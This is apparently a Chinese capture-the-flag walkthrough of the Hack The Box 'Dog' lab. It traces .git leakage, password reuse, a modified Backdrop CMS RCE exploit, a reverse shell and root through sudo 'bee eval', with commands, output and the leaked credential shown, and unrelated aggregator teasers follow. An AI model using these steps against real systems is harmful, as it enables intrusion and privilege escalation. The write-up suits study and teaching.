Linux/Dog

Dog

Enumeration

nmap

第一次掃描發現系統對外開放了22、80端口,端口詳細信息如下

┌──(kali?kali)-[~/Desktop/vegetable/HTB]
└─$ nmap -sC -sV -p 22,80 -oA nmap 10.10.11.58 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-26 03:36 EDT
Nmap scan report for 10.10.11.58
Host is up (2.3s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.93 seconds

TCP/80

瀏覽頁面,在頁面底部發現cms名稱,backdrop

訪問 nmap 掃描出的一些路徑

在里面挑了一些有意思的,但沒發現什么內容

Foothold

.git文件泄露

回到cms,在網上搜索發現了一處rce漏洞,但是需要認證

用目錄掃描器掃描可能存在的其他路徑,發現 .git

用githack.py工具還原并下載

┌──(kali?kali)-[~/Desktop/vegetable/GitHack]
└─$ python GitHack.py http://10.10.11.58/.git
[+] Download and parse index file ...
[+] LICENSE.txt
[+] README.md
[+] core/.jshintignore
[+] core/.jshintrc
[+] core/authorize.php
[+] core/cron.php
[+] core/includes/actions.inc
[+] core/includes/ajax.inc
[+] core/includes/anonymous.inc
[+] core/includes/archiver.inc

完成后,會出現一個以ip命名的文件夾

┌──(kali?kali)-[~/Desktop/vegetable/GitHack]
└─$ ls
10.10.11.58  GitHack.py  index  lib  README.md

在文件夾里找敏感信息時發現了mysql的用戶名密碼,考慮密碼復用

grep -i "root" 10.10.11.58

但是ssh和web都無法登陸,想著看能不能暴力破解,但是響應太慢了,看了看其他wp發現可以用郵件名,這確實是一個思路,郵件中@前的名字很有可能是其他地方的用戶名

┌──(kali?kali)-[~/Desktop/vegetable/GitHack]
└─$ grep -i "@dog.htb" 10.10.11.58 -r
10.10.11.58/files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:        "tiffany@dog.htb"

BackDrop RCE

得到一個用戶名,嘗試登錄tiffany:BackDropJ2024DS2024,成功登陸了,剛才看exploit database有漏洞,直接嘗試利用

┌──(kali?kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ searchsploit backdrop               
------------------------------------------- ---------------------------------Exploit Title                             |  Path
------------------------------------------- ---------------------------------
Backdrop CMS 1.20.0 - 'Multiple' Cross-Sit | php/webapps/50323.html
Backdrop CMS 1.23.0 - Stored XSS           | php/webapps/51905.txt
Backdrop CMS 1.27.1 - Authenticated Remote | php/webapps/52021.py
Backdrop Cms v1.25.1 - Stored Cross-Site S | php/webapps/51597.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results┌──(kali?kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ searchsploit -m php/webapps/52021.pyExploit: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)URL: https://www.exploit-db.com/exploits/52021Path: /usr/share/exploitdb/exploits/php/webapps/52021.pyCodes: N/AVerified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/Desktop/vegetable/HTB/Dog/52021.py

直接運行python文件,先看看怎么運行,按照提示設置參數,然后就完成了,最后兩行提示Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation.考慮在這個路徑下上傳剛才生成的文件,如果上傳成功在按照下一句提示Your shell address: http://10.10.11.58/modules/shell/shell.php,這個路徑應該就能訪問上傳的shell,看起來挺簡單

┌──(kali?kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ python 52021.py http://10.10.11.58
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php

但是第一步就出問題了,因為目錄結構的一些問題,證實需要在下面的路徑才能找到上傳按鈕

嘗試上傳shell.zip

卻被溫馨提示,只能上傳固定格式的,這個倒好說

查看生成payloads的腳本,嘗試修改一下腳本內容,將python代碼里的zip全部改成tar,其余地方不變,然后按照剛才的方式重新生成文件,可以看到第五行提示已經變成創建了shell.tar

┌──(kali?kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ python exp.py http://10.10.11.58         
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.tar
Go to http://10.10.11.58/admin/modules/install and upload the shell.tar for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php

按照相同的方式上傳 .tar 文件,顯示成功

按照腳本提示信息訪問下面的路徑,發現成功

但是這個shell很快就會被清除,先找一個合適的反向shell,拼接好,然后重新上傳 .tar 文件,快速訪問拼接好的 url,這樣在監聽端可以獲取到一個shell

┌──(kali?kali)-[~]
└─$ nc -nvlp 1234                             
listening on [any] 1234 ...
connect to [10.10.16.59] from (UNKNOWN) [10.10.11.58] 57888
bash: cannot set terminal process group (876): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dog:/var/www/html/modules/shell$ whoami
whoami
www-data

Privilege Escalation

目前的權限為 www-data,在 home 目錄下發現了兩個用戶

www-data@dog:/var/www/html/modules/shell$ ls /home
jobert  johncusack

再次考慮密碼復用,經過嘗試發現可以用剛才的密碼登錄 johncusack,因為有密碼,嘗試查看 sudo -l 內容,找到了 bee

johncusack@dog:/tmp$ sudo -l
[sudo] password for johncusack: 
Matching Defaults entries for johncusack on dog:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser johncusack may run the following commands on dog:(ALL : ALL) /usr/local/bin/bee

看看怎么用,翻譯一下

按照如下內容即可以root身份執行命令

johncusack@dog:~$ cd /var/www/html
johncusack@dog:/var/www/html$ 
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee eval "system('id');"
uid=0(root) gid=0(root) groups=0(root)
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee eval 'system("/bin/bash");'
root@dog:/var/www/html#
root@dog:/var/www/html# cat /home/johncusack/user.txt
7176e61dabe388fccd5a063ee57c616a
root@dog:/var/www/html# cat /root/root.txt
bd2e0207a6794f14909ddd58a1b836ea

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/912787.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/912787.shtml
英文地址,請注明出處:http://en.pswp.cn/news/912787.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

青少年編程與數學 02-022 專業應用軟件簡介 01 設計與創意類軟件:Adobe Creative Cloud

青少年編程與數學 02-022 專業應用軟件簡介 01 設計與創意類軟件:Adobe Creative Cloud **一、Adobe公司介紹**(一)Adobe的創立與早期發展(二)Adobe的市場地位與影響力(三)Adobe的創新文化 **二…

【亞馬遜防關聯攻略】多店鋪運營如何做好環境隔離?

在亞馬遜跨境電商中,多店運營的最大風險是賬號關聯。亞馬遜規定,同一賣家在同一站點只能擁有一個店鋪。平臺會通過多種方式追蹤注冊信息、設備和網絡環境等,如果發現關聯因素,所有關聯賬號可能被批量封禁,這會導致資金…

She‘s Coming !

#好書推薦《一本書講透汽車功能安全:標準詳解與應用實踐》 #功能安全應用指南 #功能安全實踐參考寶典 Finally, shes coming ! 她來得有點晚,但 “好飯不怕晚”。 她就是剛出爐的新書《一本書講透汽車功能安全:標準詳解與應用實踐》 京東…

如何用廢棄電腦變成服務器搭建web網站(公網訪問零成本)

文章目錄 💻 如何用廢棄電腦變成服務器搭建 Web 網站(公網訪問零成本)一、背景與目標? 本文目標: 二、準備工作(軟硬件需求)🧱 1. 硬件需求🧰 2. 軟件環境準備 三、快速搭建一個 Fl…

〔從零搭建〕指標體系平臺部署指南

🔥🔥 AllData大數據產品是可定義數據中臺,以數據平臺為底座,以數據中臺為橋梁,以機器學習平臺為中層框架,以大模型應用為上游產品,提供全鏈路數字化解決方案。 ?杭州奧零數據科技官網&#xf…

Vue3 中watch和computed

Vue 3 中 computed 與 watch 深度解析 在 Vue 3 組合中&#xff0c;響應式工具的類型安全使用至關重要。以下是詳細說明 一、watch 偵聽器 1. 基礎類型監聽 <template><div>實際參數1{{count}}</div><div><button click"count">點…

.NET測試工具Parasoft dotTEST:全兼容RMS的測試解決方案

隨著項目規模擴大&#xff0c;需求管理變得復雜&#xff0c;如何高效追溯需求與測試的關聯性成為一大挑戰。Parasoft dotTEST 提供了一套強大的需求追溯解決方案&#xff0c;不僅能自動關聯單元測試結果與需求&#xff0c;還能兼容幾乎所有需求管理系統&#xff08;RMS&#xf…

基于Jeecgboot3.8.1的vue3版本前后端分離的flowable流程管理平臺

初步遷移完成了基于jeecgboot3.8.1的vue3版本的前后端流程管理平臺,基于flowable6.8.0,同時支持bpmn流程設計器與仿釘釘流程設計器。 功能類似于3.6.3,但增加了一些以下功能: 1、支持多租戶 2、支持并行網關的任意跳轉、退回與駁回 3、流程表達式 這里流程表達式定義四…

IP 限流 vs. URI 限流

背景&#xff1a; 昨天調程序的時候遇到了一個 BUG&#xff0c;前端無法將文件正確傳給后端&#xff0c;后端報錯 EOFException&#xff08;EOF 代表 End Of File&#xff09;就是在程序嘗試從一個數據流中讀取數據時&#xff0c;發現已經到達了數據流的末尾&#xff0c;但它卻…

2025年Java常見面試題(持續更新)

數據庫事務特性。原子性、一致性、隔離性、持久性如何防止SQL注入&#xff1a;使用#不要使用$符號&#xff1b;對所有的入參做校驗&#xff1b;使用存儲過程&#xff1b;執行預處理語句和參數化查詢&#xff1b;最低權限原則&#xff1b;微服務拆分的原則&#xff1a;微服務的拆…

Spring AI ——在springboot應用中實現基本聊天功能(ChatModel)

文章目錄 前言項目版本依賴引入配置key信息編寫測試接口注入ChatModel并普通返回注入ChatModel并流式返回自定義模型對象并直接返回總結前言 在Spring AI 中,CchatClient 是一個所有大模型通用性的調用方式,對絕大多數大模型的功能點都具備封裝和見解調用性。 但這一點在部…

78、系統工程生命周期階段及方法

一、系統工程生命周期的七大階段 系統工程生命周期涵蓋從概念萌芽到系統退役的全過程&#xff0c;通常分為以下七個階段&#xff0c;每個階段具有明確目標與核心任務&#xff1a; 1.探索性研究階段 目標&#xff1a;識別利益相關者需求&#xff0c;探索技術可行性。任務&…

二十九、【用戶體驗篇】個人中心:用戶資料展示與密碼修改

二十九、【用戶體驗篇】個人中心:用戶資料展示與密碼修改 前言準備工作第一部分:后端實現 - 個人中心 API1. 修改 `UserDetailSerializer` 以支持密碼修改2. 在 `api/views.py` 中添加 `UserMeView` 和 `PasswordChangeView`3. 注冊個人中心相關 API 路由4. 后端初步測試第二…

STEP-BACK PROMPTING:退一步:通過抽象在大型語言模型中喚起推理能力

摘要 我們提出了 STEP-BACK PROMPTING&#xff0c;這是一種簡單的提示技術&#xff0c;可以讓LLM進行抽象&#xff0c;從包含具體細節的實例中推導出高層次概念和第一性原理。利用這些概念和原理來引導推理過程&#xff0c;LLM在朝向正確解答路徑上顯著提升了推理能力。我們在…

Paimon vs. HBase:全鏈路開銷對比

Paimon 在特定場景&#xff08;如流式 Lookup Join&#xff09;下&#xff0c;會為了極致的查詢性能而引入額外的存儲&#xff08;本地磁盤 LookupFile&#xff09;和計算&#xff08;構建 LookupFile&#xff09;開銷。但這是一種用一次性的、可控的開銷&#xff0c;換取后續持…

本地的包名導致的AttributeError: module ‘langchain‘ has no attribute ‘verbose‘

你遇到的 AttributeError: module langchain has no attribute verbose 問題&#xff0c;確實可能是因為你的本地文件或目錄名與 langchain 官方包沖突&#xff0c;導致 Python 在導入時優先加載了你的本地文件而非真正的 langchain 庫。 問題原因 Python 模塊加載機制&#xf…

玄機——某學校系統中挖礦病毒應急排查

本篇文章主要記錄某學校長期未運營維護的程序&#xff0c;被黑客發現了漏洞&#xff0c;但好在學校有全流量設備&#xff0c;抓取到了過程中的流量包 需要你進行上機以及結合流量分析&#xff0c;排查攻擊者利用的漏洞以及上傳利用成功的木馬 文章目錄 靶機介紹1.使用工具分析共…

如何解決wordpress批量刪除媒體庫中的圖片很慢甚至卡死問題

批量刪除WordPress媒體庫中的圖片速度很慢&#xff0c;如果批量刪除的圖片多會出現CPU100%甚至卡死&#xff0c;出現這個問題通常最主要的原因是服務器性能問題&#xff0c;如果換成性能好的服務器就不會了&#xff0c;比如換Siteground 家的服務器&#xff0c;就不會有這個問題…

深度學習入門day4--手寫數字識別初探

魚書提供的代碼可以在github找到。源碼地址 環境配置部分可以看前面幾篇博客&#xff0c;還是用Anaconda&#xff0c;運行下面代碼&#xff0c;可以看哪個庫缺失。 import importlib import numpy as np deps {"torch": "torch","torchvision"…

STM32中定時器配置,HAL_Delay的原理,滴答定時器,微秒延時實現,PWM,呼吸燈

目錄 定時器基本定時功能實現 CubeMX設置 手動書寫代碼部分 定時器啟動 實現溢出回調函數 HAL_Delay介紹 HAL_Delay實現原理 HAL_Delay的優點 HAL_Delay的缺點 利用滴答定時器(SysTick)實現微秒級延時 PWM PWM介紹 通用定時器中的重要寄存器 PWM中的捕獲比較通道 …